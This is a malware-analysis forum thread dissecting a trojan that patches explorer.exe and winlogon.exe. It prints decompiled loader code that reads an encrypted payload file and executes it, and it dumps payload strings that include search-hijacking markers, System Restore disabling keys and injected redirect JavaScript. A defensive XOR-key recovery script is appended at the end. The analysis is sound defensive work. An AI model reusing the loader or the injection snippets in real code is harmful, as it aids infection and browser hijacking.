Win32/Bamital


Postby markusg » Sat Dec 11, 2010 1:47 pm

Hi,
is Trojan.Kordeef a new one? I could not find any info.
I removed 2 patched system files, winlogon and explorer.exe, from the infected machine.
Files attached.
http://www.virustotal.com/file-scan/rep ... 1292072505
http://www.virustotal.com/file-scan/rep ... 1292072830
markusg

Re: Trojan.Kordeef  (patched files)

Postby 4everyone » Sat Dec 11, 2010 2:23 pm

Bamital used to patch Winlogon.exe & Explorer.exe. Trojan.Kordeef looks new to me.. Lemme check whether I can find any difference between Bamital & Kordeef :)

BTW,

Bamital posts can be found here..

http://www.kernelmode.info/forum/viewtopic.php?f=16&t=19&p=2095&hilit=bamital#p2095
4everyone

Re: Trojan.Kordeef  (patched files)

Postby EP_X0FF » Sat Dec 11, 2010 5:22 pm

Is there any kb.dll available? :)
I see it loads it at the overwritten entry point (explorer.exe).
Ring0 - the source of inspiration
EP_X0FF
Global Moderator

Re: Trojan.Kordeef  (patched files)

Postby markusg » Sat Dec 11, 2010 6:31 pm

sorry yes :-)
markusg

Re: Trojan.Kordeef  (patched files)

Postby EP_X0FF » Sun Dec 12, 2010 3:50 am

Sorry, but there also seems to be another file named C:\WINDOWS\system32\dll.
Can you please upload it? :)

BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
  void *pCode;
  if ( fdwReason == 1 )               // DLL_PROCESS_ATTACH
  {
    // read the second-stage payload from disk into executable memory
    pCode = ReadExecutableCode("C:\\WINDOWS\\system32\\dll");
    if ( pCode )
      ((void (__thiscall *)(_DWORD))pCode)(pCode);   // transfer control to it
  }
  return 0;
}
Ring0 - the source of inspiration
EP_X0FF
Global Moderator

Re: Trojan.Kordeef  (patched files)

Postby markusg » Sun Dec 12, 2010 10:34 am

OK, there is another one.
markusg

Re: Trojan.Kordeef  (patched files)

Postby EP_X0FF » Sun Dec 12, 2010 10:48 am

Maybe I should be more clear regarding this viewtopic.php?p=3943#p3943 :)

The code above is exactly what this kb.dll, loaded by the patched explorer.exe, is doing.

kb.dll reads file named C:\WINDOWS\System32\dll and then executes it.

That's why I'm asking about this file: it can help to understand how all this puzzle works :)
Ring0 - the source of inspiration
EP_X0FF
Global Moderator

Re: Trojan.Kordeef  (patched files)

Postby markusg » Sun Dec 12, 2010 10:55 am

OK, sorry. I understood it wrong; I first have to search for this file. It's not removed yet. Give me a bit of time :-)
markusg

Re: Trojan.Kordeef  (patched files)

Postby markusg » Sun Dec 12, 2010 5:26 pm

I found what is perhaps a dropper on another PC.
It creates the same dll files.
markusg

Re: Trojan.Kordeef  (patched files)

Postby EP_X0FF » Sun Dec 12, 2010 5:53 pm

Yes, you're right, this is the dropper.

Dropper VT result
http://www.virustotal.com/file-scan/rep ... 1292176900

C:\Windows\System32\dll is payload code, encrypted by XOR.

Once the infected explorer.exe starts, it loads kb.dll, which reads C:\windows\system32\dll, and then kb.dll executes it.

Infected Explorer.exe/Winlogon.exe --> C:\Windows\system32\kb.dll --> Read/Execute --> C:\Windows\System32\dll --> Decrypt/Execute --> Profit :)

New code decrypts itself in a simple loop [screenshot omitted] and then executes all the rest.

String data from decrypted "dll":

15 X_if _if c h r o m e . e x e f i r e f o x . e x e o p e r a . e x e i e x p l o r e . e x e GET HTTP/1.1
Host: &version= Run Software\Microsoft\Windows\CurrentVersion\Explorer\LowRegistry Flag GetUserGeoID SYSTEM\CurrentControlSet\Services\sr\Parameters
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore FirstRun DisableSR \user32.dll kb.dll k b . d l l
\updhlp.dat open -new-window <script src="http:// " type="text/javascript"></script> Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
19792079 [%subid] <d> </d> <m> </m> <e> </e> <f> </f> <j> </j> <c> </c> <u> </u> <t> </t> <p> </p> <k> </k> <b> </b> <p> </p> <k> </k> [%key] [%subid] </ul>
google.com/ Date: X55 Fut 2999 </title> <r> </r> **http%3a// User-Agent: Accept-Encoding: Content-Type: text/html GET /search GET /s? google. search.yahoo.com
bing.com ?subid= &id= .info/message.php \temp.ini \user32.dll TimeGetWork Uses32 ExitTime Ver Decode Domen Flags \admin.txt .gif .jp .png .js .ico .css .aspx /
iexplore.exe .upd & q= p= text= "> % <d> </d> <s> </s> <i> </i> &HTTP_REFERER= \ PROCESSOR_IDENTIFIER &os= &br= IE Op FF Ch &flg= &ad= &ver= \server.dat \Windows
\winhelp.exe Exists555 Explorer555 Global\EventHlpFile Global\EventHlpFile2 HlpMap555
<title> - porno yschttl spt" href="http:// <div><a href="http://rds.yahoo.com <em> </em> <a href="http:// sb_tlst"><h3><a href="http:// 
class="sb_ads <a href="http:// " <em> </em> 19091979 \Server HTTP/1.1 302 Moved Temporarily
Location: Connection: keep-alive
Content-Length: 0
Connection: close
HTTP/1.1 200 OK
<html><head><script language="JavaScript">function f(){var form = document.forms["rr"];form.submit();}if(document.cookie=="")
{if (history.length!=0) document.cookie="k=1";window.onload=f;}else{document.cookie="k=1;expires=Mon, 01-Jan-2001 00:00:00 GMT";history.back();}</script></head><body><form action="http:// " method="post" name="rr"></form></body></html> 8 / <html><head></head><body><script type="text/javascript">location.href="http:// ";
</script></body></html> N0
<title> </title> <meta keyword > </head> Content-Length: Accept-Encoding: </body> </html> Host: Referer: http:// gzip sdch none HTTP/1. 200 OK _
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Decrypted stuff attached.
Ring0 - the source of inspiration
EP_X0FF
Global Moderator
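A triage helper to illustrate the "payload code, encrypted by XOR" step described above. This is an added example, not code from the thread, from the dropper or from kb.dll. It assumes the layer is a short repeating-key XOR (the post says only "xor"), uses the strings EP_X0FF listed from the decrypted "dll" as known plaintext to recover the key from a suspect blob, and works on a constructed sample blob with an assumed 3-byte key rather than the real file.

```python
"""Recover a repeating-key XOR layer from a suspect blob via known-plaintext markers."""
from typing import Optional, Tuple

# Strings taken from the thread's dump of the decrypted "dll" payload, used as
# probable plaintext; each one visible after decryption corroborates a key.
MARKERS = [b"kb.dll", b"updhlp.dat", b"chrome.exe", b"iexplore.exe",
           b"Global\\EventHlpFile", b"Mozilla/4.0"]


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so it both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def marker_score(plain: bytes) -> int:
    """Number of known marker strings visible in a candidate plaintext."""
    return sum(1 for m in MARKERS if m in plain)


def recover_xor_key(blob: bytes, max_key_len: int = 8) -> Optional[Tuple[bytes, bytes]]:
    """For each marker, offset and key length, derive the key that would map the
    ciphertext there onto the marker, keep it only if it is periodic across the
    whole marker, and return the (key, plaintext) pair exposing the most markers."""
    best: Optional[Tuple[int, bytes, bytes]] = None
    for marker in MARKERS:
        for off in range(len(blob) - len(marker) + 1):
            stream = bytes(c ^ p for c, p in zip(blob[off:], marker))  # key stream
            for klen in range(1, min(max_key_len, len(marker)) + 1):
                if any(stream[i] != stream[i % klen] for i in range(len(marker))):
                    continue  # not periodic with this length: wrong guess
                rot = off % klen  # align the key stream to offset 0 of the blob
                key = bytes(stream[(j - rot) % klen] for j in range(klen))
                plain = xor_bytes(blob, key)
                score = marker_score(plain)
                if best is None or score > best[0]:
                    best = (score, key, plain)
    # The marker a key was derived from is always present by construction, so
    # require at least one further marker as corroboration before reporting it.
    return None if best is None or best[0] < 2 else (best[1], best[2])


# Constructed sample (not the real payload): a few of the thread's strings between
# binary filler, XOR-encrypted with an assumed 3-byte key.
SAMPLE_KEY = bytes([0x5A, 0xC3, 0x17])
SAMPLE_PLAIN = (b"\x00\x01\x02kb.dll\x00\xff\x10\\updhlp.dat\x00\x00chrome.exe\x00"
                b"Global\\EventHlpFile\x00\x7f\x00Mozilla/4.0\x00")
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAIN, SAMPLE_KEY)
```

On a real sample the marker list would be whatever strings an analyst has already confirmed in the unpacked code; with fewer than two markers in the blob the function deliberately reports nothing.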
